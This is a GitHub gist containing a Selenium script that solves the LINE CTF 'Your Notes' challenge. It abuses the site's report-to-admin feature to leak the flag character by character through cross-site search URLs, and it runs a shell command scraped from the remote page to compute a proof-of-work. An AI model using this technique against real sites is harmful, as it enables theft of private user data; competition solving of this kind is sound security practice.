Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
Line's CTF Your Notes solver.
from selenium import webdriver
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as ec
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities
import random, string, subprocess
def random_string(length):
return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))
options = webdriver.FirefoxOptions()
options.add_argument('--headless')
options.add_argument('--no-sandbox')
# driver = webdriver.Remote("HUB_URL", options=options)
driver = webdriver.Firefox(options=options)
chall_url = "http://34.84.94.138" # Change this
def create_account():
username, password = random_string(10), random_string(10)
print(f"Creating {username}:{password}")
driver.get(chall_url + "/register")
for i in range(2):
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.NAME, "username")))
driver.find_element_by_name("username").send_keys(username)
driver.find_element_by_name("password").send_keys(password)
driver.find_element_by_xpath("//button[@type='submit']").click()
def new_note(title, content):
driver.find_element_by_xpath("//a[contains(@href,'note')]").click()
driver.find_element_by_name("title").send_keys(title)
driver.find_element_by_name("content").send_keys(content)
driver.find_element_by_xpath("//button[@type='submit']").click()
WebDriverWait(driver, 10).until(ec.element_to_be_clickable((By.XPATH, "//h3[contains(@class,'title')]")))
def report(url):
while True:
print(f"Reporting {url}...")
driver.get(chall_url + "/report")
if "login" in driver.current_url:
print("Relogging")
create_account()
continue
try:
WebDriverWait(driver, 60).until(ec.element_to_be_clickable((By.NAME, "url")))
except:
continue
driver.find_element_by_name("url").send_keys(url)
proof = driver.find_element_by_xpath("/html/body/div/div/div/div[1]/form/div[4]/p[2]/strong").text.split("\n")[1].split(" ")
print(f"Calculating nonce... {proof}")
proof = subprocess.check_output(proof).decode()
print(f"Proof is {proof}")
driver.find_element_by_name("proof").send_keys(proof)
driver.find_element_by_xpath("/html/body/div/div/div/div[1]/form/div[3]/p/button").click()
try:
WebDriverWait(driver, 60).until(ec.element_to_be_clickable((By.XPATH, "/html/body/div/div/div/div[1]/form/div[5]")))
except:
continue
if "Thank" in driver.find_element_by_xpath("/html/body/div/div/div/div[1]/form/div[5]").text:
return False
else:
return True
create_account()
known = "LINECTF{1-kn0w-what-y0u-d0wn10ad}"
charset = "}" + "-" + string.ascii_lowercase + string.digits
index = 0
while known[-1] != "}":
url = f"{chall_url}/search?q={known}{charset[index]}&download="
print(f"Trying {known}{charset[index]} - {index}")
if report(url):
known += charset[index]
print(f"Found {known}")
if index == len(charset)-1:
index = 0
else:
index +=1
driver.close()
driver.quit()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment